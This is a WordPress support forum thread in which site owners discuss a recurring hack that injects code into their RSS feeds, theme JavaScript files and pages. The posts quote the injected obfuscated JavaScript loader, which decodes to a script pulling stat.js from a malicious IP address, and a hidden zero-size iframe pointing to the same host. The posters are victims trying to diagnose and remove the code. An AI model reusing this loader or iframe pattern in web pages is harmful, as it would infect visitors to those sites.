Title: RSS Feed Error
Last modified: August 19, 2016

---

# RSS Feed Error

 *  [cwary](https://wordpress.org/support/users/cwary/)
 * (@cwary)
 * [17 years, 2 months ago](https://wordpress.org/support/topic/rss-feed-error-13/)
 * I’m having some problems with my RSS feed, can’t get it to work in feedburner
   and won’t work with firefox live bookmarks either. I ran it through Feed Validator
   and the problem apparently is the code below that’s added to the end of the feed
   contains HTML tags and only one high level on is allowed. Anybody have any clue
   on what’s doing this or how to edit it?
 * If its important the problem was the first HTML tag and its on line 362, which
   is after the RSS tag is already closed out.
 * ‘# <html>
    # <script language=”javascript”> # <!– # var s=””,i,c=0,o=””; # var
   str=”60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106
   |97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47
   |47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97
   |116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|”; # l=str.length; # for(
   c=0;c<=str.length-1;c++){ # while(str.charAt(c)!=’|’)s=s+str.charAt(c++); # o
   =o+String.fromCharCode(s); # s=””;} # document.write(o); # –> # </script> # </
   html>’

Viewing 9 replies - 1 through 9 (of 9 total)

 *  Thread Starter [cwary](https://wordpress.org/support/users/cwary/)
 * (@cwary)
 * [17 years, 2 months ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023198)
 * I’ve just figured out that code there is on all of my pages and the ascii numbers
   point to this
    <script type=”text/javascript” src=’[http://84.244.138.55/stats/stat.js”></script&gt](http://84.244.138.55/stats/stat.js”></script&gt);
 * I just put up my site, but it looks like its already been hacked somehow? I don’t
   see of any plugins this could be connected to. Any tips on how to get rid of 
   this code without having to reinstall all of wordpress?
 *  [moneyprogress](https://wordpress.org/support/users/moneyprogress/)
 * (@moneyprogress)
 * [17 years, 2 months ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023319)
 * I just ran into this code on my site as well. The code was inserted into a menu.
   js file inside my wordpress theme. I have no idea how it got there!
 * Have you installed any new plugins recently?
 *  Thread Starter [cwary](https://wordpress.org/support/users/cwary/)
 * (@cwary)
 * [17 years, 2 months ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023339)
 * I Ended up reinstalling wordpress and that worked…for a little. It mysteriously
   showed up again today, and I can’t figure our why or how.
 * Here’s the plugins I’m running:
    FeedSmith Global Translator Google XML Sitemaps
   Headspace 2 Privacy Policy Robots Meta SEO Friendly Images SEO Slugs Weather 
   Widget.
 * I’m also using the amazing grace template.
 *  Thread Starter [cwary](https://wordpress.org/support/users/cwary/)
 * (@cwary)
 * [17 years, 2 months ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023340)
 * Looking up the domain [http://84.244.138.55](http://84.244.138.55) in WhoIs I
   got this information:
    ‘ inetnum: 84.244.138.0 – 84.244.138.127 netname: Serverboost-
   2 descr: IP Space provided by We Dare country: NL admin-c: Sr4706-RIPE tech-c:
   Sr4706-RIPE status: ASSIGNED PA mnt-by: WEDARE-MNT source: RIPE # Filtered role:
   Serverboost role address: Vlaardingerdijk 430 address: 3117 ZW Schiedam address:
   The Netherlands phone: +31 (0)6 1482 4915 abuse-mailbox: admin-c: JM6599-RIPE
   tech-c: JM6599-RIPE nic-hdl: Sr4706-RIPE mnt-by: MNT-I3D source: RIPE # Filtered
 * route: 84.244.128.0/18
    descr: Route to first IP-numberblock We Dare BV origin:
   AS20495 mnt-by: WEDARE-MNT source: RIPE # Filtered
 * route: 84.244.128.0/19
    descr: We Dare B.V. origin: AS20495 mnt-by: WEDARE-MNT
   source: RIPE # Filtered’
 * The resolve host is web.xxxgallz.com.
 * I’m really at a loss for what’s going on here, google analytics has me getting
   a visit from the Netherlands today, so that could be it, but I don’t know why
   this would have happened twice to my blog when I’ve just posted and have a hot
   10 people coming to it per day.
 *  [carrotwax](https://wordpress.org/support/users/carrotwax/)
 * (@carrotwax)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023372)
 * This is a VIRUS. Your site has been hacked. Delete this immediately.
 * Basically, if you decode the numbers, it goes to another site and executes a 
   downloaded script in an iframe so it’s not visible.
 * Within a few days, google will notice your site as having malware and will block
   searches.
 * Does anyone have any idea on how this is installed? I’ve heard of it going into
   both wordpress and joomla.
 *  [dsi](https://wordpress.org/support/users/dsi/)
 * (@dsi)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023373)
 * This malware also seems to be affecting my site – [http://www.dpadmagazine.com](http://www.dpadmagazine.com)–
   but having looked through all of the files and pages, I can’t find any inserted
   code.
 * A gap has also appeared at the top of the page when viewed in Firefox 3 on Windows
   and some Footer code has disappeared. I’m presuming it’s a hack, but having not
   been able to find this code I’ve no idea on how to fix it.
 * Anyone able to help?
 *  [buxton25](https://wordpress.org/support/users/buxton25/)
 * (@buxton25)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023377)
 * When you’ve been looking at the code have you been looking at the source online
   or in your local files?
    We’ve had problems a few times with code from xxxgallz
   being put into our site (most recent was this morning), the code usually gets
   put in the bottom of out javascript files though the most recent was put in at
   the bottom of the actual homepage with script tags.
 * Does anyone know how they could keep getting in? Our hosts tell us there’s no
   security problems with their servers and it could be something we have installed
   and could be because of our wordpress, maybe we don’t have permissions set correctly
   and these people are exploiting that?
 * It always seems to be some kind of tracking or analytics script, but I don’t 
   know what benefit a dutch porn site would get from having information about our
   visitors?
 *  [dsi](https://wordpress.org/support/users/dsi/)
 * (@dsi)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023388)
 * We checked the online files. We still couldn’t find the code but someone looking
   into it spotted the following invisible iframe. I’ve removed the http below just
   in case but it was 84.244.138.55.
 * <iframe height=”0%” frameborder=”0″ width=”0%” scrolling=”auto” noresize=”” marginwidth
   =”0″ marginheight=”0″ src=”http:/ts/in.cgi?sltest”/>
 * We did however find a random cache.php file on the server which we deleted, which
   also removed the random gap at the top of the page. After resubmitting the site
   for review, it passed, only to then fail almost immediately. The cache.php hasn’t
   reappeared, and we’re completely stumped as to how to progress…
 *  [UseShots](https://wordpress.org/support/users/useshots/)
 * (@useshots)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023392)
 * Hi,
 * This is a prevalent hack for the last couple of weeks. I’ve just blogged about
   it. (I’m posting the link in hope it will help resolve the issue)
    [http://blog.unmaskparasites.com/2009/04/02/malicious-stats-from-84-244-138-0/](http://blog.unmaskparasites.com/2009/04/02/malicious-stats-from-84-244-138-0/)
 * I have a strong feeling this hack has to do with compromised passwords.
    Scan
   your computer for spyware and then change all site passwords.

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘RSS Feed Error’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 9 replies
 * 6 participants
 * Last reply from: [UseShots](https://wordpress.org/support/users/useshots/)
 * Last activity: [17 years, 1 month ago](https://wordpress.org/support/topic/rss-feed-error-13/#post-1023392)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics